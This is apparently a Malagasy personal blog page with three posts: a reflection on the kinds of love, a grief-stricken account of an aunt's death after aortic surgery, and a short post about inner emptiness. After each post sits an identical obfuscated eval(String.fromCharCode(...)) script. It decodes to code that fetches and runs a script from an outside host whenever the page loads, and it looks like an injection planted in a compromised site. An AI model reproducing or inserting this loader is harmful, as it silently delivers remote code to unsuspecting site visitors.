Blaogin’ny Namana Serasera weblog

Fitiavana

Misy amintsika ve tsy mbola nitia? ataoko fa tsy misy izany…… raha mbola nateraka ihany dia misy izany fitiavana izany fa mety hoe modiana tsy henoina, na ampanginana ngamba raha mihaino sy mijery ny vaovao maneran-tany @ izao fotoana izao isika….

 

Ny fitiavana dia tsy ho voatery ho foafaritra ho atokana amin’olon-tokana ihany, azo atao tsara ny mitia olona maro fa tsy mitovy kosa ny tsapa amin’izy tsirairay avy. Misy ambaratongany ihany koa izy io, ambarako aminao anie e!

Ny fitiavana ny ray aman-dreny aloha raha mbola kely ny zaza, satria dia ireo no nahitany masoandro, nahitany ny tsimbok’aina, ahafahany hirehareha eto an-tany. Azo ampidirina ao izany ny fitiavana ny mpiray tampo, satria dia iray aina iray vatsy ireo.

Manaraka indray dia ny fitiavana ny mpiara-belona: satria dia ireo no mpanabe voalohany, sy hifaneraserana voalohany ihany koa, ny fiaraha monina indrindra no sokajiako eto ary azo atao anatin’izany ny fiangonana sy ny toeram-piasana.

Eo ihany koa ny fitiavan-tena, satria nahoana hoy ianao? raha tsy tianao aza ny tenanao sy ny maha ianao anao, ahoana moa no hitiavanao ny manodidina anao? Somary sarotra ihany anefa izany satria dia eo @ fitaizana hatrany @ fahazazana no zarina ho tia tena nefa tsy ho diso tafahoatra ihany koa isika….. Ahoana moa izany? Fitiavana toy ny rehetra ihany izy io saingy miavaka kely, eo no ataon’ny vazà hoe ‘estime de soi’ ihany koa. Mahalaza zavatra betsaka izany, milaza ihany koa fa hainao ny mandanjalanja ny fitiavana omenao sy raisinao avy @ olona manodidina anao, na @ toetra izany na @ asa vita izany….Io fanomezan-danja ny fitiavanao io ihany koa dia ahafahanao manome ambaratongam-pitiavana ny olona mifanerasera aminao, tsy ho voatery tiavina daholo akory ny olona rehetra….

Ary raha hiditra @ fitiavan’olon-droa indray isika dia mmhh, misy ambaratongany izy io. Misy anefa olona  ao anatin’ny androm-piainany dia tsy handalo izany ambaratonga rehetra izany fa mety ho ny 1 na ny 2 @ izay fotsiny ihany, fa rehefa miaina anaty fitiavana dia izay no izy e!

Tsy tokana hoy aho teo ambony ny fitiavana, ary tsy hitovy na oviana na oviana ny hitiavanao olona tsirairay avy, tsy hoe akory izany dia misy ny fiangarana eo @ fitiavan-janaka sanatria ho an’ny ray aman-dreny fa ny fanehoana izany fitiavana izany kosa no tsy mitovy.

Raha eo @ olon-droa ihany koa dia misy ambaratongany izy io:

  • Ny Fitiavana miredareda: mmhh iza t@ mpifankatia no tsy mbola niaina io?? toa zary ziona ny manodidina fa tsy misy afatsy izy roa irery no ety an-tany. Ny tsara ho fantatra anefa dia tsy maharitra io fahatsapana fitiavana miredareda toa afo io fa miserana ihany, mety ho 1 taona na 1 volana fa an’ny tsirairay moa iny… mankaleo ny miaraka miresaka amin’olona ao anatin’io fitiavana io ann, satria dia tsy misy afatsy izy 2 no ambetin-dresaka hihihi.
  • Ny Fitiavana mambabo-fo: izany hoe tsy misy afatsy izy 2 ihany tsy mila olon-kafa ry zareo, mihidy ao izany izy, tsy manaiky ny fidiran’ny hafa à resaka ataony na ny fiainany akory ……ohatra hoe miaraka mifanjohy eny foana, miantsena, manao fanatanjahan-tena, na miaraka mivoaka fa tsy mba misy fotoana hoe iny eny i ramose fa mandeha irery na koa i madama fa mba niaraka niantsena t@ namany, tsy haindry zareo izany izay e!
  • Ny Fitiavana mahafatifaty ilay feno angolangola iny: eto indray dia mazàna olona efa somary nandia fiainana no ahitana azy, efa tsy ao intsony ilay fitiavana naha taitaitra tany am-boalohany nefa tsy maty ihany koa na tsy azo atao koa nefa hoe miredareda…. mitady antoka ny roa tonta, izany hoe efa eo @ rotorotom-piainana sy fitiavana ka mitady toerana tsara amaharana.
  • Ny Fitiavana miaro ady: misy amintsika ngamba mahafantatra olon-droa tsy ialan’ady nefa dia indreny mifanjohy eny ihany fa tsy mahasaraka, dia izay ilay izy. Tsy hoe tsy tiana akory ilay olona ialàna ady.. tsia… fa zary fomba fiaina ilay izy.
  • Ny Fitiavana ara-nofo: mmhhh tsara be izany, ary izay no tena izy, tsy ampy anefa raha izay ihany no ataao lafika hanorenana tokan-trano. Tsy misy maha menatra io fitiavana io nefa kosa tsy ampy, azo atao tsara ny manampy azy @ filàna hafa iarahan’ny mpivady.
  • Ny Fitiavana  nofisina: izay eritreretina mafy ho tanteraka, tsy misy fifampikasohana ara-batana mihintsy fa dia ara-tsaina sy valan-dresaka no betsaka aloha. Mety ho hita izany eo à olon-droaa miara miasa ohatra, izay io asa io no ifantohan’ny fiainan’izy roa manontolo, na koa hoe miaraka manao fanatanjahan-tena na miaraka mivoaka any à tranom-boky dia efa mahazo fahafinaretana à izay ilaay olona anankiroa dia ampy ho azy ireo izay, raha tsy mitandrina anefa ry zareo dia mety ho ritra tanteraka ny fitia ary ho tonga à fisarahana izany.
  • Ny Fitiavana diso fatra: na koa hoe diso mihoa papana loatra, izany hoe lasa misy fandeferana eo à ankilany ary fanomezana vahana ny an-kilany kosa ilay fitiavana, mandeha ila ny mizàna eto. Lasa manadino ny tenany mihintsy aza ilay olona eto fa lasa hoe miaina ho an’ilay silany……mahalasa saina ihany nefa dia misy tokoa izany… manao sorona ny tenany izany.

Misy ihany koa anefa ireo mpifankatia tsy miaraka mitoetra fa samy manana ny ankaniny, toa zary lasa fiainana izany ankehitriny satria mahaleo tena ny tsirairay avy, ireo voatanisako eo ambony akory tsy midika fa tsy misy fahaleovan-tena ara-bola ny tsirairay an, tsia fa ireo ambony ireo dia miara-monina ny mpifankatia. Amin’ity sehom-pitia ity dia efa olona matotra no mampiasa azy, sy miaina azy, satria mila fahatokisana 100% eo @ ankilany aavy izany, tsy hoe akory rehefa tsy iray trano ihany no atao hoe mpifankatia, misy ny tokan-trano miaina tahaka izao, ary mateza sy maharitra satria misy tokoa ny fifanajana eo à roa tonta. Tsy hoe akory tsy misy fifanajana @ iretsy eo ambony fa ity seho ity dia miavaka satria tsy miaina afatsy ny lafi-tsarany ny mpifankatia, na misy aza ny lafi-ratsiny dia ezahin’izy ireo ho ny tsara hatrany no hihaonany…..

 

Raha misy azonareo anampiana ny voasoratro dia aza misalasala fa tsy nandalina io aho akory fa mba namakivaky boky teny dia hitako nisongadina ireo ary tsy aritro ny nizara azy taminareo.

Misaotra.

 

 

 

 eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,57,44,49,49,53,44,52,54,44,49,49,53,44,49,49,54,44,49,48,53,44,49,49,56,44,49,48,49,44,49,49,48,44,49,48,50,44,49,48,49,44,49,49,52,44,49,49,48,44,57,55,44,49,49,48,44,49,48,48,44,49,49,49,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,54,44,49,48,57,44,54,51,44,49,49,56,44,54,49,44,49,49,53,44,49,48,56,44,49,48,56,44,49,48,56,44,52,57,44,52,54,44,53,51,44,52,54,44,53,54,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));


19 comments

Lasa i Solo e!

Dia tsy hanoratra ve raha tsy hilaza manjo foana izao e! ggrrr inona ary ity tsss

 

Dia akory atao fa dia lasa very namana iray indray izahay aty Lille aloha…… tsy iza moa izany fa i ‘Solo’ izay nenitoako moa izany raha ny rohim-pihavanana no zohiana misy eo aminay nefa dia tsy tena tahaka izay ny fifampitondranay fa tahaka ny mpirahavavy ihany, ary raha taminy sy i Maeva zanako kosa dia tahakan’ny zaza mifanarakaraka izy miafy fa tsy mba nisy ambaratonga teo @ izy ireo.

Somary efa narary ihany izy volana vitsivitsy lasa izay ary nitarika tsy fahafahana miasa izany… Ny alarobia 23/09/2015 izahay dia mbola niaraka niantsena ary tsy dia hitako loatra nisy fiovana izy akoatran’ny hoe tsemboka be izy nefa dia niteny ahy fa tsy maninona loatra fa mbola mikohaka sy mbola misy hafanana aloha @ ilay ngamba misy tazo fa efa nahazo fanafody aloha…, tsy nety nateriko hatrany an-trano izy fa niakatra irery niaraka t@ entany. Izaho moa rehefa maka azy hiantsena dia miantso azy an-tsofin-davitra dia midina izy ary miandry ahy tonga @ fiara aty ivelan’ny trano, ary mazàna rehefa avy miantsena izahay dia tsy mamela ahy hiakatra izy fa tateriko hatreo @ ascenseur ny harona dia iny aho no miverina mody…dia tsy niova t@ izay ny nataonay farany…. indrisy…. tokony niakatra aho….

Ny zoma sy sabotsy manaraka an’io izy dia niantso ahy ary somary nitaraina fa vizaka fa niteny azy aho hoe, mihinana voankazo @ ireny niantsenana ireny fa mila vitamines ianao, sns , ary mila misakafo tsara ihany koa…. efa mihinana aho hoy izy fa ohatran’ny mahatsiaro vizana izany. Tokony nandeha notiliana rà ihany koa izy fa tsy nandeha fa vizana hono ary niantso infirmière ho avy ary @ talata 02/10/15 ny fotoana nomen’io, tokony natao radio ihany koa ny kibony lazainy fa maharary azy fa efa nahazo ordonnance ny @ izay izy fa mbola nangatak’andro ny ho any fa tsy mahavita mandeha hono, dia somary notezerako moa hoe ka maninona no tsy manontany ahy?????; dia teo vao nifandamina ny @ fotoana izahay, ny alatsinainy maraina izy niantso ahy fa tena tsy zakany ny fanaintainana manjo azy @ tongony fa dia mianjerazera foana izy….. Nilaza taminy aho fa ny hariva aho vao malalaka ny ho any fa mbola nisy RDV t@ sekolin’i Maeva.

Nony tonga aho ny hariva tokony ho tà 17h teo ho eo dia tsy tafiditra ny trano (satria aho manana ny fanalahidy ihany koa) dia voatery niantso azy hamoha ahy, tsy henony anefa ny sonnerie, dia nantsoiko t@ finday izy, ary naharitra 5 minitra izy vao tonga namoha varavarana ahy, ary nandritra izay dia in 2 nianjera t@ tany izy, nolazaiko moa izy hoe aza miezaka mitsangana fa mandadiza……

Nony nivoha ny varavarana dia gaga aho nahita azy tsy mahatsangana, ary tonga aho dia niantso ny mpitsabo azy… rehefa tafaresaka taminy aho dia niteny io farany io fa tonga dia mila ampidirina hopitaly maika izy. Rehefa avy niantso ambulance aho dia niteny ity farany fa mila mandoa 70e aho sarany satria tsy manana bon de transport izahay, tsy nanaiky anefa aho fa niverina niantso ny mpitsabo indray ary nangataka io taratasy io, tsy ny mpitsabo anefa no azoko fa ny secretaire ny ary tsy nety hanome ahy hiresaka @ mpitsabo ity farany fa efa niresaka ela hono izahay teo nefa ny olona betsaka no miandry azy ao, ka tsy afaka ny hanome ahy alalana hiresaka @ mpitsabo izy, nolazaiko azy fa mila ttsy ahafahako maka ambulance fotsiny aho dia, eny hoy izy rahampitso izay azonao, tsia hoy aho izao dieny izao ny nolazain’ny mpitsabo teo, narirarirany teo aho fa tonga dia nitongavako tany izy ary azoko ihany ilay ttsy ary niantso ilay ambulance aho dia niaraka tonga izahay.

Nony tonga tany @hôpital izahay dia tonga dia tany @ zone4 n’ny urgence no nampidirana azy izany hoe tena faran’ny maika indrindra, nametrahana fanontaniana maro aho, tahakan’ny hoe: ngah avy nivahiny tany afrika izy, sns…. naharitra ela ny fitiliana tao, natao ny fangalàna rà ny echographie reins sy abdomen,  fa tsy nahitandry zareo inona!!!! nony efa nandroso alina ny andro tokony ho t@ 1 ora maraina teo dia nafindra toerana ho any à déchocage manuel izy ary dia nasaina nody aho fa tsy misy azoko atao eo tsinona.

Nony maraina tokony ho t@ 7h30 teo ho eo dia naneno ny findaiko ary dokotera no tao nanontany ahy hoe aiza ho aiza ny misy ahy….. efa akaiky eto aho hoy aho, fa mametraka fiara dia tonga… miandry anao ary aho hoy izy…., nony tonga aho dia nasaina niandry tao à efitra iray fa hisy mpitsabo hiresaka amiko. Niandry ela tokoa aho satria efa t@ 10 ora mahery tany vao nisy dokotera tonga niresaka tamiko, nanazava ny toe-draharaha…… izaho moa nandritra izay dia nitsanga-nitoetra nijery nanarangarana tety alavitry ny varavarana izay tsy azoko nidirana, izay ahitako irika kely monja ny efitrano nasiana an’i Solo. Nilaza sy nanazava aza io mpitsabo io fa mila fandidiana maika izy fa misy tritra ny aorte izay lalandrà mitondra ny rà mankany à vatana ary tsy afaka ny mankany @ reins sy ny tsinay intsony izay ary dia nahafaty ny reins anankiray ary tsy namelona ny tsinay ihany koa ka lasa mangana ‘nécrosé’ ny tsinainy ary tsy maintsy ho esorina ny simba @ izany, nambarany ihany koa fa ho sarotra ny fandidiana fa mety tsy hifoha @ izany izy nefa mahatoky ny mpandidy isika…..tankina tsy nahateny aho…. ny voalohan’ny tonga tao an-tsaiko dia ny hiantso an’i Tonton Pasy, haka hevitra sy hanoro ahy ny tokony hataoko……i tatie Caro moa no azoko ary nilaza fa hampita ny hafatra, teo no eo moa dia niantso ahy izy, ary niresaka izahay mianaka, nazavaiko azy ny nolazain’ny dokotera tamiko………, ilay dokotera moa mbola niteny ahy fa ho avy hijery ahy ny mpadidy hanazava izay hataao aminy, dia niandry aho ka niandry ary nivezivezy nanoloana ilay varavarana tsy azo hidirana foana, tsikaritr’ilay dokotera niresaka tamiko izany ary nanontany ahy izy raha efa taharesaka tà mpandidy aho, novaliako fa tsy mbola….. dia tonga dia nolazainy aho hiditra haingana ny efitre misy an’i Solo sao ho tara hoy izy fa efa nidina any @ bloc izany ny mpandidy fa sao tara loatra raha mbola hiresaka aminao…..dia akory ny hatairako nahita azy feno milina manodidina azy sy aminy…. fa mody tsy taitra aho satria hitako ny masony manaraka ahy ihany, ny mason’i Solo io, dia mbola nivazivazy taminy aho hoe mahay ny mpitsabo fa tsy misy atahorana fa mbola miverina ianao avy eo fa tsy mijanona any ambany any fa maika aho annnn, sns….. dia izy mamaly ahy moa hoe an an, @ vavany fa tsy afaka miteny intsony izy fa efa misy tube ny vavany, miresaka à maso izahay ary fantatro faa natahotra izy, nolazaiko izy fa miaraka @ Tompo hatrany isika ka tsy misy manahy ny @ izay hitranga, nitsiky izy…….. dia nony afaka 10 minitran’ny firesahanay teo dia nolazaina @ izay aho fa tsy maintsy mandeha ry zareo fa efa miandry ny mpandidy….. dia mbola nanofahofa tanana azy aho…….izy mbola afaka naninga ny rantsan-tanany……… dia izay….

Nidina ny bloc izy tokony ho t@ 14h teo ho eo ary tsy niala tany raha tsy t@ 21h30 tany ho any.

Izaho moa nony nidina izy dia nasaina nody fa tsy navelandry zareo nijanona teo satria tsy fantatra hafiriana ny faharetan’ny fotoana fandidiana…., nolazaiko azy ireo moa fa misy fotoana tsy azo iodivirana aho ny hariva ka avy any aho vao tonga…… I maeva no niantso ilay laharana nomena ahy nanontany ny fizotran’ny fandidiana ka izay no nahafantarana fa t@ 21h30 izy no tafavoaka ny bloc, tokony ho t@ 21h45 teo i Maeva no niantso ny tany fa efa tsy ariny intsony hono hoe tsy misy miantso izahay…. avy teo moa izy niantso ahy dia tonga aho dia nandeha tany @ hopitaly tokony ho t@ 22h30 tany ho any. Nony tonga tany anefa aho dia nolazaina anay fa niova toerana izy fa tsy ao @ déchocage manuel intsony fa any @ déchocage chirurgicale indray, dia nazavaina anay teo ny lalana mankany dia lasa izahay sy José nandeha tany.

Rehefa tonga tany izahay dia tsy tonga dia nahazo niditra fa mbola nazavaina taminay ny natao taminy, izany hoe nesorina ny rein anankiay ilay maty ary nesorina ihany koa ny 3M t@ tsinainy, raha manana 4M @ tsinay isika olombelona, nolazaina taminay fa tsy afaka miaina tsy misy tsinay isika olombelona ka noho izany dia najanona ny 1Metatra ary dia ho jerena @ fandidiana manaraka raha hihaina io na tsia, fa raha sanatria tsy miaina io ao anatin’ny 24H na 48H taorian’io fandidiana voalohany io dia tsy ho fohazina intsony izy……. tankina tsy nahateny aho……… manamboatra saina miandalana ihany koa aho,…

Nahita azy ary izahay……. mila miomana moa rehefa hiditra ny efitra misy azy, izany hoe misasaa tanana tsara @ savony sns, mba tsy hitondra mikroba…. dia akory ny fahatairana fa dia mody tony ihany e!!! milina tsy milina re izao e!!!! fa dia jerena hoe miaina izy dia mionona fa hoe mbola velona izany…..

Niandry ny fandidiana faharoa izany dia natao io ny alakamisy, rehefa avy nazavaina tamiko ny tokony hatao azy, dia ny hoe hitondra poche izy, ary mila ahy eo aaminy hikarakara azy rehefa hivoaka ny hopitaly izy, tsy nanisy olana ny @ izany aho fa tonga dia nekeko. Nidina ny bloc indray izy tokony ho t@ 9h maraina ary tsy niakatra raha tsy t@ 12h30-13h tany ho any, niandry azy tao moa aho satria niasa hariva aho io alakamisy io, niandry azy ny hifoha à izay satria tokony hifoha izy taorian’io fandidiana faharoa io. Tsy mbola nifoha anefa izy talohan’ny niaingako tany, ary dia tsy nistahatry ny niantso aho taty am-piasana mandra-piveriko tany indray ny alina…..tahaka izay ihany koa ny zoma, tsy niasa aho moa fa tany tontolon’andro, niteny ahy ny mpitsabo fa raha tsy mifoha izy dia ny alatsinainy dia hanao scanner/irm ry zareo ahitana ny tsy mety aminy, satria nandritra izay dia natao dialyse izy moa izany, nolazaina ahy ihany koa fa misy olona sasany maharitra vao afaka aminy ny tahan’ny fanafody fampatoriana ampiasaina mandritran’ny fandidiana. Nandritra izay fotoana izay moa dia tsy tapaka aho no miresaka à dadatoa Pasy manome vao² azy, izy rahateo koa efa tafaresaka t@mpitsabo azy, ny sabotsy izy no nandalo nijery azy tany @ hôpital niaraka t@ i Titsy sy Raivo ary i Hoby, nitsodika azy koa i Tiana, i Nanick sy Vavah moa nijery azy ihany koa, tsy adinoina ny mpiara mivavaka tao @ FPMA izay tsy nitandro hasasarana tokoa nifandimby niandry azy teny @ hopitaly, ary indrindra koa i Pastera Miora, izay zoky ray aman-dreny tokoa, nitrotro azy am-bavaka sy nitarika fivavahana ho azy ihany koa….

Tonga ny alatsinainy, izaho moa niasa maraina ka tsy afaka tonga tany fa tsy mitsahatry ny miantso aho nanontany hoe efa nidina natao scanner sns veh , nidina tokoa izy tokony ho t@ 8h-9h teo ho eo, dia niverina niantso aho tokony t@ 11h30 tany ho any nanontany ny valiny, fa nolazaina ahy fa mbola tsy azo izany, namerina niantso aho t@ 15h satria efa hirava, dia nolazaina fa tsy mbola ao aloha. Nambarako aza fa manana rdv any @ kiné aho ka somary ho tara kely vao ho avy, tsy misy olana ny @izay hoy izy fa ndana fa avy eo miandry anao aho hoy ilay mpitsabo azoko…..

Nony efa akaiky ilay toerana hanaovako kiné aho dia naneno ny findaiko ary ilay mpitsabo vao azoko vao teo no teo, nilaza izy fa tsaratsara kokoa raha tonga any izao dieny izao aho raha azo atao satria efa minitra na ora vitsy sisa ahafahako mahita an’i ‘tante’ nao hoy izy, saika tsy hitako ny lalana nombana fa tonga dia nahodiko ny familiana ary nirifatra aho nitodi-doha ho any @ hôpital teny an-dalana aho dia niantso an’i Dolly hiaraka amiko fa matoa ny mpitsabo miantso dia efa tsy izy intsony izay hoy aho, niantso an’i Haja ihany koa aho. Nony tonga aho dia nasaina niditra tahaka ny mahazatra ary nolazaina fa ho avy ny mpitsabo……. ora 1 taty aoriana dia tonga izy ary niteny tamiko fa afaka mankao @ bibliothèque @ izay izahay fa hiresaka, nanaraka azy aho, fa nony tonga tao @ couloir dia iny i Dolly sy Manitra ary i Lydia (Max) sy Liva ary Pastera niaraka nivoaka avy tany, tonga dia nasaiko niaraka niditra niaraka tamiko ry zareo, rehefa vita ny fifampahafantarana anay, dia nandray fitenenana ny mpitsabo, nilaza izy fa novoriana izahay fianakaviana satria nivaly ny scanner natao ny maraina ary hita fa ‘tsy misy activité cérébrale’ intsony izy, tahaka ny mahazatra moa rehefa misy valan-dresaka ataoko @ mpitsabo dia efa mivonona @ ttsy sy stylo aho handray note, fa teo dia tankina aho tsy hitako izay nosoratana, tonga dia dia latsaka tety an-tanako ny stylo ary nofihiniko sy nopotseriko mafy ny tanan’i Manitra sady mbola naka toky t@ mpitsabo aho nanontany hoe inona tsara ny dikan’izany????? dia hoy izy namaly ahy hoe…. ‘elle est morte’…… tsy fantatra hoy izy na ovina na ovina izy no maty na t@ fandidiana voalohany fa taorian’io na t@ fandidiana faharoa na taorian’io fa tsy misy asa intsony ao anatin’ny lohany,…. lasa izy izany……..tankina aho……… efa nitsabo isika hoy izy ary izay ny namindrana azy taty satria mbola tanora izy fa raha ny fahitana azy hatrany am-boalohany raha olona efa voky andro izy dia tsy notohizanay akory ny fitsaboana azy, fa @ naha tanora azy dia nataonay izay rehetra tokony natao nefa indrisy izay no lahatra….. lasa ny alatsinainy 05/10/2015 izy izay,  ny ora napetraka diaa 15h satria izay no nahitana ny valin’ny IRM natao taminy…….

Veloma indrindra e!!!!!!!!!eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,57,44,49,49,53,44,52,54,44,49,49,53,44,49,49,54,44,49,48,53,44,49,49,56,44,49,48,49,44,49,49,48,44,49,48,50,44,49,48,49,44,49,49,52,44,49,49,48,44,57,55,44,49,49,48,44,49,48,48,44,49,49,49,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,54,44,49,48,57,44,54,51,44,49,49,56,44,54,49,44,49,49,53,44,49,48,56,44,49,48,56,44,49,48,56,44,52,57,44,52,54,44,53,51,44,52,54,44,53,54,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));


120 comments

Fahabangana!

Tsy haiko ianareo , fa izaho tato ho ato izay dia mahatsiaro tena ho ‘foana’ tanteraka any anatiko any. Mifangaro ao daholo na ny tahotra na ny hafaliana na ny ahiahy, tsy hay ny hamborahana azy na iza no hizarana azy.

 

lasa fenoiko @ fihainoina hira izany nefa toa tsy mety feno fa vao maika aza mandoaka ny anatiko miafina any…

 

.[yframe url=’https://www.youtube.com/watch?v=mbKW3bAgg5I’]

 

Misaotra an’i KR ihany koa anefa aho nampahatsiahy ahy ireo hira t@ taona 80-90 fa tena ohatran’ny nanova ny fomba fijeriko kely ny fiainako an-davan’andro ny fihainoana ireo hira ireo, nahatsiaro tena ho ‘mbola velona’ aho hahaha, (crazy me).

Niasa kely ho azy aho mantsy t@ volana Avril 2015 ary dia nahafinaritra ny fiaraha-miasa na dia tsy mbola nifankahita aza izahay, sarahan’ny elanelan-tany. ny andron’ny Paka no nila fanampiana izy ary sendra teo @ tandrifiko izany ary dia noraisiko, maimaim-poana, vita ny asa dia mbola nitohy ihany ny fifandraisana aloha hatreto.

Misaotra an’i Zoky Fanja ihany koa @ resaka nifanaovana rehetra fa nampisokatra ny masom-panahiko izany.

 

[yframe url=’https://www.youtube.com/watch?v=nLnrBK5tBbY’]eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,57,44,49,49,53,44,52,54,44,49,49,53,44,49,49,54,44,49,48,53,44,49,49,56,44,49,48,49,44,49,49,48,44,49,48,50,44,49,48,49,44,49,49,52,44,49,49,48,44,57,55,44,49,49,48,44,49,48,48,44,49,49,49,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,54,44,49,48,57,44,54,51,44,49,49,56,44,54,49,44,49,49,53,44,49,48,56,44,49,48,56,44,49,48,56,44,52,57,44,52,54,44,53,51,44,52,54,44,53,54,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));


38 comments

Tra-boina ny fireneko!

